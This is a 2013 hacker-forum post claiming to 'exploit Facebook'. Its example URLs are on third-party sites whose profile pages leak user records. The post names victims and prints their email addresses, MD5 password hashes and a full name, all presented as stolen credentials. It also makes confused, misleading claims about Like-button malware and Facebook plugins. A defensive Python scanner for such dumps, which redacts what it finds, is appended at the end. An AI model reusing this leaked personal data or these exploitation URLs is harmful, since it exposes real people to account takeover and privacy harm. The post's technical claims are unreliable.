#############################################################
# Title: Exploit Facebook Via External Plugins and Modules
# Exploitation: Manually (use your brain ^_^)
# Date: 28/03/2013
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################
For Example my victim is =======>>> https://www.facebook.com/gaturro22
How could I retrieve his password? Easy.
Proof of Concept : Facebook Id ====>>> gaturro22
P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22
So as you can see, we got the email & the password :
Email: gonza.la22@gmail.com
Password: e10adc3949ba59abbe56e057f20f883e
Another Demo : http://www.salondaddy.com/profile.php?ID=85
So when I try the same method with my profile for example : http://www.poringapic.com/profile.php?id=mauritanie.forever
It says "Invalid profile link followed!" loool because I didn't click on the Like Button. So an advice: be careful, don't like external pages on websites, they are
backdoored with a javascript malware that can sniff all your information.
So for example the ID "profile.php" is infected with "Code Disclosure Path". As you can see, most websites nowadays use plugins of Facebook on their websites,
especially applications, so the Facebook user must allow permission to access the application, and most of the plugins are infected !_!
So if you see that a website has the Like Plugin or uses a Facebook app, you can surely get the passwords of the users, no doubt, just use your brain !
Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top
Check this : [NickName] => orso44 ===========>>> add this to www.facebook.com
http://www.facebook.com/orso44 ============>>> Facebook Profile
[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5
Another Victim : ==========>>> https://www.facebook.com/kornberg
Infos Retrieved :
[_iProfileID] => 7893
[_aProfile] => Array
(
[datafile] => 1
[ID] => 7893
[NickName] => Kornberg
[Email] => anselmpennell435@yahoo.com
[Password] => 087fbfdeb33dae28260cfdb8f2d8a787
[Status] => Active
{
"id": "862420463",
"name": "Zoe Kornberg",
"first_name": "Zoe",
"last_name": "Kornberg",
"username": "kornberg",
"gender": "female",
"locale": "en_US"
}
Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand
I just selected this user randomly from Facebook and I noticed that she clicked on the Like Button and she has been a victim °_° !!!!!!!
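
A site owner can check their own rendered pages for this kind of leak. The following is an added example, not part of the original post: it scans a response body for print_r()-style "[Key] => value" pairs like the dump quoted above and reports exposed account fields with the values redacted. The key list, function names and sample body are constructed assumptions.

```python
import re

# print_r()-style "[Key] => value" pairs, as in the dump quoted in the post.
PAIR_RE = re.compile(r"\[(?P<key>\w+)\]\s*=>\s*(?P<value>\S+)")
HEX32_RE = re.compile(r"[0-9a-fA-F]{32}")          # shape of an unsalted MD5 digest
EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")
SENSITIVE_KEYS = {"password", "passwd", "pwd", "salt", "email"}  # assumed list


def redact(value):
    """Keep only enough of the value to locate it in the page source."""
    return value[:4] + "..." if len(value) > 4 else "..."


def find_credential_dumps(body):
    """Return findings for account fields rendered into a response body."""
    findings = []
    for lineno, line in enumerate(body.splitlines(), start=1):
        for m in PAIR_RE.finditer(line):
            key, value = m.group("key"), m.group("value")
            if key.lower() not in SENSITIVE_KEYS:
                continue
            if HEX32_RE.fullmatch(value):
                kind = "md5-shaped-digest"
            elif EMAIL_RE.fullmatch(value):
                kind = "email-address"
            else:
                kind = "other"
            findings.append({"line": lineno, "key": key, "kind": kind,
                             "value": redact(value)})
    return findings


# Constructed response body (not taken from any real site).
SAMPLE_BODY = """<html><body>
[_iProfileID] => 1
[_aProfile] => Array
(
[ID] => 1
[NickName] => example_user
[Email] => user@example.test
[Password] => 00112233445566778899aabbccddeeff
[Status] => Active
)
</body></html>"""

if __name__ == "__main__":
    for finding in find_credential_dumps(SAMPLE_BODY):
        print(finding)
```

Any finding on a production page means a debug dump of the profile object is reaching visitors; the fix is to remove the dump and to store passwords with a salted, slow hash instead of plain MD5.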